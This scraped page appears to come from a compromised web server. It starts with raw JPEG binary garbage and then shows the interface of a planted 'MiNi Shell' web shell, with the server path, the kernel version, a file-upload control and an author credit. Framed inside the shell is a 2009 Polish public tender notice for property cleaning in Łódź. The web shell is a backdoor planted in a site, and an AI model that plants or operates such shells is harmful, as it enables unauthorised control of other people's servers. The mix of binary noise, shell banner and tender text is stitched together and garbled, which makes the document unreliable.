JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090327/55877-N-2009.html

<p class="kh_header"><b>Łódź: Świadczenie usług sprzątania posesji administrowanych przez A.N.Ł.Ś. CENTRUM I</b><br>
<b>Numer ogłoszenia: 55877 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Śródmieście Centrum I , ul. Piotrkowska 86, 90-103 Łódź, woj. łódzkie, tel. 042 6300806 w. 122, faks 042 6300808.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług sprzątania posesji administrowanych przez A.N.Ł.Ś. CENTRUM I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje utrzymywanie sprzątanych posesji w należytym stanie sanitarno - porządkowym poprzez wykonywanie n/w czynności własnymi materiałami, narzędziami i środkami czystości w następującym zakresie:
1.1  Obsługa codzienna: dotyczy Pakietu Nr 1, 2 
- sprzątanie powierzchni wewnętrznych budynków - CPV 90911200-8 tj. klatek schodowych, korytarzy i ubikacji ogólnego użytku wraz z dezynfekcją
     - sprzątanie powierzchni zewnętrznej wokół posesji zabudowanych- CP 90611000-3 j. placów, podwórzy, prześwitów bramowych, chodników wraz z dojściami, dojazdami, pergolami, czyszczenie wycieraczek klatek schodowych 
1.2. Obsługa codzienna: dotyczy  Pakietu nr 3  
- sprzątanie powierzchni wewnętrznych budynków - CPV 90911200-8 tj. klatek schodowych, korytarzy i ubikacji ogólnego użytku wraz z dezynfekcją
     - sprzątanie powierzchni zewnętrznej w tzw. ruchu ciągłym poprzez zapewnienie w różnych
      porach dnia (dotyczy także sobót, niedziel i świąt),   prawidłowego stanu sanitarnego,  wokół 
      posesji zabudowanych- CP 90611000-3 tj. placów, podwórzy, prześwitów bramowych, chodników wraz z dojściami, dojazdami, pergolami, czyszczenie wycieraczek klatek schodowych 
1.3 Obsługa okresowa
       - raz w tygodniu - mycie klatek schodowych i WC ogólnego
 - raz w miesiącu - sprzątanie korytarzy piwnicznych , pomieszczeń pralni, strychów i suszarni, mycie parapetów grzejników, drzwi, lamperii
 - dwa razy do roku - mycie okien - CPV 90911300-9, numerów policyjnych, gablot, tablic ogłoszeniowych
1.4  Obsługa uzależniona od występowania potrzeb 
      - zmywanie chodnika położonego wzdłuż nieruchomości, zgodnie z Uchwałą Nr LXIII/1185/06 Rady Miejskiej w Łodzi - Regulaminem otrzymania  czystości i porządku na terenie Miasta Łodzi, Rozdział 2 § 4.1. pkt 5
- zbieranie nieczystości
- zakup i wkręcanie żarówek w miarę występowania potrzeb
- zakup i wywieszanie flag na polecenie Zamawiającego
- oczyszczanie kratek ściekowych  oraz
-  informowanie o potrzebie wykonania dezynsekcji i deratyzacji
-  sygnalizowanie nieterminowego wywozu nieczystości z pojemników
1.5 Roznoszenie korespondencji adresowanej do najemców i właścicieli w terminach i godzinach ściśle uzgodnionych z administratorem po uprzednim wywieszeniu ogłoszeń w nieruchomości
- informowanie  Zamawiającego o zauważonych usterkach technicznych występujących w sprzątanych posesjach oraz napisach i plakatach pojawiających się na murach - niezwłocznie po ich zauważeniu.
2.Wykonawca zobowiązany jest także do wykonywania prac związanych z likwidacją skutków zimy
- odśnieżanie - CPV 90620000-9 oraz zakup i posypywanie piaskiem podwórzy, chodników 
- likwidacja skutków gołoledzi - CPV  90630000-2
-wywóz śniegu z wąskich chodników poza teren posesji w miejsce uzgodnione z Zamawiającym 
3. Zamawiający dopuszcza składanie ofert częściowych, częściami zamówienia są poszczególne pakiety adresowe nr 1, 2, i 3. Wykonawca może złożyć ofertę na dowolną ilość pakietów adresowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.90.00.00-6, 90.91.12.00-8, 90.61.10.00-3, 90.62.00.00-9, 90.91.13.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> INFORMACJE DOTYCZĄCE WARUNKÓW WYMAGANYCH OD WYKONAWCÓW ORAZ OPIS SPOSOBU OCENY ICH SPEŁNIANIA
1.W przetargu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki: 
1.1  -    posiadają uprawnienia do wykonywania określonej działalności lub czynności,
1.2  - posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3 - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4 - nie podlegają wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 PZP 
oraz warunki dodatkowe tj.:
- wyrażą zgodę na wymagany przez Zamawiającego termin płatności faktury - 30 dni od daty złożenia jej w siedzibie Zamawiającego,
- wyrażą zgodę na  wymagany przez Zamawiającego okres realizacji przedmiotu zamówienia.
2.Sposób dokonywania oceny spełniania w/w warunków
2.1 Ocena spełniania warunków będzie dokonywana na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia.
2.2 Warunki spełnią wykonawcy którzy:
ad 1.1 - posiadają uprawnienia do wykonywania działalności określonej przedmiotem zamówienia
ad 1.2 -  w okresie ostatnich 3 lat przed wszczęciem postępowania ( a jeżeli okres działalności jest krótszy - w tym okresie ) wykonują lub wykonali minimum 1 usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia
ad 1.3 - są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 50 000,00 zł   
ad 1.4 - złożą oświadczenie, że spełniają warunki udziału w postępowaniu o których mowa w  art. 22 ust.1 PZP oraz dokumenty i oświadczenia wymienione w pkt IV ppkt. 3  SIWZ
2.3 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:
- warunki określone w pkt 1.1, 1.4 - spełnia każdy z wykonawców
- warunek określony w pkt 1.2,1.3 - spełniają łącznie wszyscy wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy załączyć następujące dokumenty i oświadczenia potwierdzające spełnianie wymaganych warunków:
3.1 W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 PZP:
3.1.1 - aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3.1.2 - oświadczenie wykonawcy, że spełnia warunki określone w art.22 ust.1 PZP ( załącznik nr 2 do SIWZ).
3.2 W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia:
3.2.1 -  wykaz wykonywanych lub wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców z załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie.(załącznik nr 4 do SIWZ)
3.3 W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia:
3.3.1 - polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 50 000,00 zł
W przypadku opłacania polisy w kilku częściach należy również załączyć dokument potwierdzający opłacenie ostatniej składki.
W przypadku upływu terminu ważności polisy w trakcie realizacji umowy, Zamawiający będzie żądał przedłożenia kserokopii nowej polisy potwierdzonej -za zgodność z oryginałem - przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.centrum1.com3.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Śródmieście CENTRUM I 90-103 Łódź ul. Piotrkowska 86 pokój nr 107.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2009 godzina 10:30, miejsce: Administracja Nieruchomościami Łódź - Śródmieście CENTRUM I 90-103 Łódź ul. Piotrkowska 86 pokój nr 107.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na podstawie art.144 ust.1 PZP Zamawiający przewiduje możliwość dokonania zmian postanowień umowy z wybranym Wykonawcą w następujących przypadkach:
1 - zmiany podwykonawcy lub udzielenia części zamówienia podwykonawcy;
2 - zmiany terminu wykonania zamówienia, gdy zmiana wynika z okoliczności , których nie można było przewidzieć w chwili zawarcia umowy np.: toczące się nowe postępowanie na świadczenie usług objętych umową;
3 - zmiany przedmiotu zamówienia pod warunkiem, że będzie ona korzystna dla Zamawiającego albo zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, np. polegające na zmniejszeniu ilości m2 w obsługiwanych nieruchomościach, zmiany stanu własności  nieruchomości tzn.:   nieruchomość stanowiąca własność Gminy Łódź przekształci się we wspólnotę mieszkaniową lub zmieni właściciela bądź zarządcę.

Creat By MiNi SheLL
Email: jattceo@gmail.com